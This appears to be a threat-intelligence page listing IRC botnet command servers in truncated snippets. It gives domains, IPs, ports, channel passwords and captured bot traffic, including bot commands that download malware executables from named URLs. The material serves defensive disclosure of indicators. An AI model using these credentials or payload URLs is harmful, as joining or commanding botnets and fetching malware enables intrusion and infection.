Domain names used to control the botnet: hdp.zapto.org 46.166.141.149 active 1n1.sytes.net 213.155.7.39 active hdp.zapto.org not active hgjma1.biz not active jma1.biz not active mooo.com 72.8.150.1 active n1.mooo.com 86.35.19.116 active fhdp.zapto.org Remote Host Port Number 199.15.234.7 80 50.22.107.93 80 213.155.7.39 2009 PASS ngr NICK n{US|XPa}dcbcoox USER dcbcoox 0 0 :dcbcoox JOIN #juaz ngrBot PRIVMSG #juaz :[d=”http://creatucurso.net/facu/mx.exe” s=”198683Read more...
216.246.78.247(irc bot hosted in United States New York Hostforweb Inc)
Remote Host Port Number 216.246.78.247 2345 NICK New[USA|00|P|75060] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-9002 * 0 :COMPUTERNAME MODE New[USA|00|P|75060] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/216.246.78.247
tool.manitam.com(mIRC bots hosted in United Kingdom Redstation Limited)
tool.manitam.com 176.227.199.27 dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 C&C Server: 176.227.199.27:6669 Server Password: Username: m0x Nickname: [x0x]XP92288 Channel: #d0x (Password: ) Channeltopic: Bot Config: On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMircRead more...
mysticalisboss.info(2k ngrBots hosted in Netherlands Amsterdam Ecatel Ltd)
The noob behind this net is a very big hf hecker named Mystical Remote Host Port Number 199.15.234.7 80 80.82.66.220 6667 Local users: Current Local Users: 1199 Max: 2019 Global users: Current Global Users: 1199 Max: 2019 PONG :B070CCDD JOIN #Techno PONG :Unreal.ircd NICK n{US|XP-32a}ffmidty USER ffmidty 0 * :ffmidty Other channels: #gBot 8 [+sntu]Read more...
pandafix.com.br(Banking Trojan hosted in Brazil Caxias Do Sul Comite Gestor Da Internet No Brasil)
This malware injects to notepad.exe notepad.exe – Network Activity – DNS Queries: dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136 www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp – HTTP Conversations: 50.16.240.166:80 – [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 “OK” 200.98.197.80:80 – [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 “Not Found” 187.17.98.44:80Read more...
199.19.105.67(ngrBot hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number 199.15.234.7 80 200.121.52.63 80 199.19.105.67 1085 PASS mypass NICK n{US|XPa}wwphlrx USER wwphlrx 0 0 :wwphlrx JOIN #boss secret PRIVMSG #boss :[DNS]: Blocked 0 domain(s) – Redirected 6 domain(s) [#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ] hosting infos: http://whois.domaintools.com/199.19.105.67
46.166.140.140(ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)
Remote Host Port Number 199.15.234.7 80 46.166.140.140 6667 PASS secret Clients: I have 111 clients and 0 servers Local users: Current Local Users: 111 Max: 205 Global users: Current Global Users: 111 Max: 205 NICK n{US|XPa}mthtknh USER mthtknh 0 0 :mthtknh JOIN #bone peruch Now talking in #bone Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP] Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP] hostingRead more...
108.163.164.154 (irc botnet hosted in Canada Verdun Iweb Technologies Inc)
Remote Host Port Number 108.163.164.154 1863 MODE {XPUSA706826} -ix PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:DOCUME~1UserNameLOCALS~1Temperaseme_02130.exe @ 31.8KB/sec. QUIT 3,1 Actualizando al nuevo binario NICK {XPUSA48968} USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA48968} -ix JOIN #per JOIN #per1 hosting infos: http://whois.domaintools.com/108.163.164.154
fasterthanhim.com(ngrBot hosted in Russian Federation Llc Komplit Plyus)
Domains used for the botnet: chicken1000.mooo.com 127.0.0.2 not active yet api.wipmania.com 199.15.234.7 fasterthanhim.com 91.226.78.31 active sad-stone.com NONE not active yet sad-stone.com.local NONE not active yet C&C Server: 91.226.78.31:8765 Server Password: Username: dxvzrjf Nickname: n{DE|XPa}dxvzrjf Channel: #GODS (Password: secret) Channeltopic: :~up http://www.emprender.edu.co/media/system/js/war.exe 24e3da41454dcbe517037d306c644245 ~mdns http://www.farmaciavirtual.com.co/pruebas/z.txt sample here and here hosting infos: http://whois.domaintools.com/91.226.78.31
37.59.74.224(irc botnet hosted in OVH ISP Paris, France)
Remote Host Port Number 37.59.74.224 6665 PASS google_cache2.tmp NICK new[fbe-XP-USA]286504 USER 0348 “” “TsGh” :0348 PONG :901E418A JOIN #G u12344u Now talking in #G Topic On: [ #G ] [ ] Topic By: [ inm ] Joins: [fbe-XP-YEM]541433 [5414@0wn3d-F3F21148.dynamic.yemennet.ye] Joins: [fbe-XP-SAU]731906 [4962@84EEFA9B.2199BF6.97E20028.IP] Joins: [fbe-XP-SAU]000244 [0002@37AB46F7.7A8C2D64.C25393E1.IP] Joins: [fbe-XP-SAU]737710 [7377@C250848.3BBB233E.5822195F.IP] Joins: [fbe-XP-SAU]372114 [3721@DFD745AA.8F1AA4B1.A97334FE.IP] Joins: [fbe-W7-USA]180197 [0792@4A76F5E6.CCDF15C9.3AA76D10.IP] hostingRead more...